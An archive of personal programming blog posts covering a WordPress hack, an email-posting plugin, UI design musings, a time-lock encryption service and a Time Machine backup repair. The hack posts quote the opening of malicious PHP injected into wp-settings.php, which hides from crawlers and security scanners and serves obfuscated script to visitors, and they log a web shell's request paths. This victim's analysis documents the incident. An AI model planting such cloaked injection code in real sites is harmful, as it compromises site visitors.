Category Archives: programming

Blog Hack – a bit more info.

Leave a reply

The security team at my ISP (dreamhost) found yet more infection in my blog.  The appearance of a wordpress blog can vary by installing different themes.  In the directory of one of these themes they found a file containing tool for giving a remote user a shell prompt (there is a version of the script  here).  The theme in question is not a standard wordpress theme; it is a variant I wrote up a while back.  I used it for a while a long time ago.  Which means the URL to access this was obscure.

I only retain logs for a month.  But on Jan 13th  84.3.40.172 pulled it once; notably that visit didn’t include a user agent making me think it was only enqueuing me for futher work.
On the 14th    86.106.170.114 came to visit (his user agent string was “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5”) and he proceed to:

…php
…php?d=/home/<myusername>/enthusiasm.cozy.org/
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&e=wp-settings.php
…php?d=/home/<myusername>/
…php?d=/home/

I assume that last step was to check if other users on the server might happen to have left their directories unprotected.
My current somewhat baseless guess is that this has been infecting my installation since April of 2008.  So, it is not unlikely that I brought the infection with me when I moved to Dreamhost in Oct 2008.

Argh, Blog Hacked

6 Replies

This blog uses WordPress plus a very few plugins.  That’s built on PHP.  So, it’s just asking for trouble.

Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working.  I’m a professional, so I provided the Guild’s standard response: “Works for me.”  Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader.  Finally run the RSS validator on it which announces there is a <script> tag in the feed.  Eh, what!  I don’t see that doing view source in my browser.  Hm.

Finally I pull the feed with curl and that version has the problem.  Prepended on the RSS feed is a script that while compressed and obfuscated.  The obfuscation means it’s got lot of unique tokens in it, i.e. CeHxprJ, lJeVYuCF, UYwXC, and google finds a copy of the script here: http://pastebay.com/82974  but, that link has disappeared, presumably because that paste bot has a setting that will discard postings after 24 hours.

The infection in my blog was in wp-settings.php.  A second <php> block had been inserted at the front of the file.  That injected the script into every page, not just the RSS feed.  Here’s the start of that code.  As you can see it isn’t injected into every page; only certain browsers and then only if there aren’t any cookies yet.  That explains why I didn’t see it in my browser and I assume how “generous in what they accept” RSS readers explains why which people were getting my posts.

<?php
@ob_start();
@error_reporting(0);
if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT']) && strlen($_SERVER['HTTP_USER_AGENT'])>5 && sizeof($_COOKIE)==0) {
print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); }  etc


I removed it.  All the rest of the php files had md5 checksums that match the distribution of wordpress 2.9.1.  Of course I am, presumably, still  vulnerable  to what ever infected the blog to begin with.

Bleck.

Postie

2 Replies
I’m inordinately happy to  have finally puzzled out how to enable posting to my blog via email.  The last few times I’d tried to get this to work something or another ruined my fun.

WordPress tempts you into thinking that you can post by email.  But the built in mechanism is flawed in enough ways to make it dead to me.  E.g. –  can only handle simple mail formats, it can only hand unencrypted POP3, and finally didn’t work at all.

But, happy day the  wordpress plugin Postie works for me.

It’s a bit complex to get all the toggles set right.  For example I rarely send email in rich text format, but in this case it’s worth it since the converter will handle all the formating.  Including images.  Floating images!

WordPress tries hard, but the image editing is really too tedious, and its editor is fine; but not as good as the one in my mail program.  And, my mail program there has grammar checking.

Getting all the settings right is delicate.  By default you need to email from the same account you WordPress user id is associated with.  And, you may need to change the email address associated with your admin account for that to work; since I assume it picks the first account it finds.  You will want to check that your blog knows what time zone it’s in, that’s on the general WordPress settings page.  There is also a setting in Postie, but fix the blog’s setting first.  It helped to toggle the “preferred text type” in the postie message settings to “html.”  And you’ll need yet another email account.

Initially I had all the email originated postings filed under “drafts,” and I recommend that until you think you have all the bugs worked out.  But, I’m somewhat sad admit, I still fiddle with the final result by hand.  In particular it isn’t quite getting the paragraph breaks right.

Hiding the cursor++

2 Replies

Back in the day I used to write code for graphic user interfaces.  If you write code like that you develop a eye for details that hopefully are invisible to other folks.  For example I happen to know that when you typing the mouse cursor is hidden and then later when you move the mouse the cursor reappears.  If the mouse cursor doesn’t disappear when I’m typing it causes a bit of cognitive dissonance.

Since I did that kind of work starting in college and then very intensely for the years after the Macintosh was released I’ve had the fun of watching as people tried every possible variation of how they might make a UI work.  I think that search space is pretty well mined out.  Stuff is rediscovered all the time.  Rarely somebody stumbles on a new idea.  Most of the time the computers get faster so things become possible that were just too slugish to do before.

In recent years as I’ve become interested in how we manage our attention I’ve become increasingly interested in UI schemes that help with that problem.  I’m a huge fan of Readablity, a bookmarklet that attempts to glean out only the text you want to read from your web page.  And I like the hack for the Mac Spirited Away that automatically hides applications that have fallen into the background on the desktop for some period.  I desperately wish I could find a similar hack that would replace, on demand, the entire screen with the content area (and only the content) of the topmost window.

Those are all examples of hide the clutter when I’m doing something, and they are directly analogous to the hide the cursor when I’m typing.  There is a dirth of good schemes for automatically hiding when I’m reading.

Anyhow the new scheme that Google recently deployed of hiding the clutter on their homepage until you move the mouse pointer is, amusingly, a direct extension of the hide the standard mouse pointer when typing (and he is typing right?).  My silly brain screamed out “bug!” when I first saw this; complete with a diagnosis that the code for mouse pointer hiding was hiding too much stuff.  The same part of my brain then tried to puzzle out how code got the clutter into the top most overlay which includes the mouse cursor.

Who knows?  Maybe it will become standard practice to hide other clutter, in addition to the mouse pointer, upon typing.

Craft of Software Management

1 Reply

Nice list

  • Continuous deployment.
  • Tell a good change from a bad change quickly
  • Revert a bad change quickly
  • Work in small batches (at IMVU, large batch = 3 days worth of work)
  • Break large projects down into small batches
  • Have a cluster immune system
  • Run tests locally. Everyone gets a complete sandbox
  • Continuous integration server – tests to ensure all features that worked before still works
  • Incremental deploy – reject changes that move metrics out of bounds
  • Alerting and predictive monitoring – wake somebody up if metric goes out of bounds. Use historical trends to predict  acceptable bounds.
  • Conduct rapid split tests: A/B testing is key to validating hypotheses
  • Follow the AAAs of metrics: actionable, accessible and auditable

But for heaven sakes!  Nothing on this list is particularly insightful or new.  All these things were true in 1980.  Have we learned nothing?  Is the schooling around software development so weak that these are news to people?  This list ignores the much more fundamental question of when those rules get broken.  Hint: about half your time will be spent in that state.  But what’s key is knowing when that is a good witch v.s. a bad witch.  The only customer/user input or feed back loop in that list is A/B testing.  That is particularly bogus!

Feeling cranking.  The old joke for the 1970s about the software industry:  “I am blessed to have stood on the toes of giants!”

Self Binding Service

10 Replies

Arising from my interest in impulse control, hyperbolic discounting, and will power I have been nursing an interest in how people enforce their personal rules.  Say you wish to promise to go to bed at 10pm, or not to drink before 5pm, or to save 10% of your income, or call your mom once a week what tools exist to help you keep those promises.  The literature highlights the amusing point that you can’t write contracts with your self as the counter party and then expect to have recourse to the courts when you break those contracts.

If you keep your eyes open you will notice assorted tools for self binding.  To do lists, reminder services, and date books are simple examples.  There are software applications that will lock out your internet access.  There are savings plans that include a penalty for early withdrawal.  In Arizona you can sign onto a list that requires the casino to deny you access.

Some of the promise keeping aids involve enlisting a third party.  There is a horrible scheme that addicts fall into where they enlist a friend and license him to punish them in some awful manner if they break their promise.  For example they might write a letter which will ruin their professional life if revealed and then give it to the third party.  Once you introduce the third party there is all kinds of risk for abuse.  The third party might extract a promise from a victim during an irrational moment by coercion.  A light weight example of that is how the salesman at the health club pressures customers into signing up for a subscription.  And then, there are chastity belts.

Some of these promise or binding technologies are designed to remove the temptation entirely.  For example: living in the dry town, never buying the liquor, and avoiding the pub.  And those come in degrees – for example moving the ice cream to the back of the freezer.

I’ve been stewing on what might be the lightest weight service a third party could offer to help individuals with this class of problems.  And I have a theory.  It’s based on the time-lock example used for bank vaults.  In that case the bank want’s to remove any possibility of opening the vault for some period of time – usually while the bank is closed.  While obviously the bank’s intent is to keep criminals from stealing their money they actually promise not to open the vault under any circumstances.  They are self binding.  They could of locked the vault with a one time password and given it to a trusted officer of the bank.  They don’t trust themselves.  Apparently the only thing they trust is the people who built the vault.  It’s interesting that if you look at pictures of these time locks they are usually in transparent cases so anybody can visually inspect the mechanism.  They are over engineered and simple which encourages that inspection.

Say you wanted to lock up a present for christmas day.  You put it in a safe, put it under the tree, and christmas morning you hand the key to the recipient.  But what if you want to wrap up a present for yourself and you don’t trust yourself not to open it too soon.  Now what?  You could ask the help of a friend, but that’s got other complications.  Can you solve this problem without a third party?  You could if you could buy a time-lock.  I’d love to know of a vendor.  I’ve not found one.  I find that bizarre; surely there are lots of people who’d like to lock things overnight etc.

Anyhow, I’ve built one for you.  It’s based on a bit-o-crypto.  You lock up things up by encrypting them, and later when the timer runs out you can decrypt them.  Frustratingly this does involve a third party, my little service.  You get the means to encrypt by going to the service, and later once the timer has run out, you go back to get the means to decrypt.  This depends on public/private keys.  You use the public key to encrypt and the private key to decrypt.

For example say you want to make it much harder to play that damn addictive video game until next tuesday.  You go grab the public key for next tuesday and lock away the damn game by encrypting it.  Next tuesday, or sometime after, you go grab the private key and decrypt the stupid game.

Of course this requires that you trust me to keep the service running and not loose the keys it gin’d up.  I wouldn’t recommend trusting me, yet.  For example I really haven’t tested it much :).

Here’s the service http://hang-on.appspot.com/.  I’d love to hear suggestions for things to do with this, or ways to improve it.

I love a good bug

1 Reply

This is such a great bug.

There’s a rounding-error bug in the camera driver’s autofocus routine (which uses a timestamp) that causes autofocus to behave poorly on a 24.5-day cycle. That is, it’ll work for 24.5 days, then have poor performance for 24.5 days, then work again.

The 17th is the start of a new “works correctly” cycle, so the devices will be fine for a while. A permanent fix is in the works.

So their good for the Thanksgiving holidays, but if they don’t get a move on it’s going to ruin Christmas and New Years!

Tell it to the Blog

2 Replies

We have a little joke around the house.  When somebody starts complaining we occationally lean back and mumble – “Tell it to the blog.”  It’s s cruel and unsympathetic pleasure.  So … I’m here to tell it to the blog.

I love my MacBook Air but for the last week we have fallen into a very abusive relationship.

Little over  a week ago the hinge broke.  Mine was purchased a year and half ago and it has a twin bought on the same purchase order.  It’s twin’s hinge broke two weeks before mine.  There were small signs of a problem, a slight looseness in the hinge.  But that’s all and that problem had existed for at least a year.

We had little problem getting Apple to fix either of these machines.  They both had the extended warrenty.  I dropped mine off on a Monday afternoon and got it back on Thursday evening.  The visit to the Apple store was tedious with a hour plus wait followed by a half hour just to fill in the forms on their very slow computers.  I was delighted that they also fixed a slight stickiness that had developed on the left side of the ‘mouse’ button.

Before returning it I let Time Machine finish a backup to my time capsule.  I then mounted the backup and poked around, copying a few essentials to a temporary user account on another Mac in the house.  I then wiped the disk and installed a virgin release of Leopard with an account for the repair guys to use.

While it was in the shop I pulled one or two needed files from the backup.  That was the first time I noticed a problem.  When i went to mount the backup from the Time Capsule via wifi to another laptop it fell into a check the disk image.  I let that run for twelve hours, overnight plus, and finally lost patience.  I hit the skip button on the dialog and while later it mounted the image and I pulled the files I needed.

When I got the repaired machine home had a load of trouble right out of the box.  I plugged in a USB hub and plugged in the Apple Superdrive and the USB-Ethernet dongle.  That didn’t work.  In fact nothing worked on the USB.  Not my headset, not my printer, not with or without the dongle.  But then I noticed that the System Profiler could see these devices come and go as I plugged them in.  So I fire up an insta-theory that the USB firmware was updated at some point and the virgin copy of Leopard doesn’t like that.  So I take the full suite of updates.  That involves a hour plus in the status “running script” but afterward my USB devices are working again.

Well, except.  I now discover that the Apple Superdrive will not work across a USB hub.  You see Apple decided to make this widget non-standard; presumably for some compelling reason involving my aspirations to be a DVD producer.  Since it won’t work over a hub you can’t have both the machine booted from the install DVD and get the advantages of restoring via the Ethernet dongle.  Well maybe I can mount the DVD remotely.  That doesn’t work for me.  I can mount the disk remotely but when I goes to reboot off the disk that doesn’t work.  Much later I puzzle out that you need to be running a special application on the machine that is providing the DVD to do these installs.

You may have noticed that at this point I haven’t gotten to trying to use my backup at all.  But I decide to grab a few more files off the backup so I can get something done in the midst of restoring the machine.  So I try to mount the backup and this time I think I really ought to let that checking run to completion.  So I hook up the Ethernet dongle and let it run.  A few hours later it announces that the backup is broken and suggests I should run Disk Utility to fix it.

So I do.  Hours pass.  It fails.  I try again.  Hours pass.  If fails.

There are numerous discussions on the net of troubles with Time Capsule backups getting corrupted, and there are other discussions of Mac disk images and disk drives getting corrupted.  In fact there are plenty of postings about all file systems getting into bogus states and what to do.  I read lots of these.

Time Machine, at least when backup up to a Time Capsule, writes into a disk image who’s format is known as a sparse bundle.  On the Mac bundles are file system folders full of stuff, and the folder is marked so the UI shows it as a single object.  That’s all sort of irrelevant except that if you want to copy or move a bundle you need to be sure to use a tool that respects those markings and of course you’d want to be sure you move all the soft and hard links without changing them.  The command rsync with the -aE (or -avE) switches is a candidate for doing that.  But when I do it I don’t get the special markings, i.e the extended attributes that the -E switch is intended to get.  And, yes, I did it as root.  Of course you’d rather do your repair attempts on a copy, and better yet if you can get that copy on a fast directly connected drive.  I tried a bit but so far I haven’t puzzled out how to get a working copy of one of these sparse bundles off the Time Capsule.

The advise on how to repair disks or disk images that get corrupted come in stages.  Stage one: run disk util.  Stage two: run fsck_hfs.  Stage two is actually no different than stage one; but it’s hard to be sure so you try it.  Did I mention that each one of these experiments takes hours and you want to do it twice since you cling to the hope each run is actually improving something.  Stage three: run fsck_hfs and ask it to rebuild the catalog.

At this point I have three complains from various checking programs.  Something about threads, something about inode size, and something about corrupted journal.  So stage four: turn off the journaling and try again.  Doesn’t help.

Stage five: dispair.

Stage six: Consider running some other disk repair software.  There are two.  One is called Disk Warrior (~$100 and they mail you the software), and the other is called TechTool Deluxe.  You get a copy of TechTool Deluxe with your extended warranty.  It’s no help since apparently it can’t see the disk unless I can mount the disk, which I can’t.

Stage seven: try to force the sparse bundle to mount without checking.  I fail at my attempts to do this using the unix command line and return to dispair.

Stage eight: try via the Finder.  Doesn’t work on two Macs, but it does work on a third.  That machine says the drive is damaged and that I should backup, erase the drive, etc. immediately.  This makes me snort.

I then copy the latest backup file hierarchy off and heave a huge sigh of relief.

So that’s what I did with most of the last four days of my life.  Still to do is to check all the other sparse bundles on that time capsule, i.e. the backups of other machines in the house.  And then I have to decide what to do so that next time this happens all the details will be different.  I hate computers.